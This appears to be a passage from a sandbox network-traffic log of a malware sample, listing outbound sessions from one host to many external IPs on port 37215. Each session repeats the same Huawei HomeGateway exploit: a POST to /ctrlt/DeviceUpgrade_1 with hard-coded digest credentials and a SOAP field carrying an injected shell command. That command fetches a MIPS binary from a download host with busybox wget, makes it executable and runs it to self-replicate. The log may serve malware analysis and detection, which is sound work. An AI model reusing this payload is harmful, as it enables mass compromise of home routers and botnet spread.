                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1411192.168.2.235574692.131.254.24337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.536103964 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1412192.168.2.2353708205.176.179.6037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.536109924 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1413192.168.2.2340494152.180.23.10437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.536128998 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1414192.168.2.2341980125.175.149.10137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.536176920 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1415192.168.2.2348510170.73.174.22137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.536176920 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1416192.168.2.2341966157.142.105.24137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.536240101 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1417192.168.2.2339360157.51.171.21437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.536245108 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1418192.168.2.235517441.92.110.12537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.536245108 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1419192.168.2.2358820157.250.64.23337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.536246061 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1420192.168.2.2335428196.72.16.18437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.536547899 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
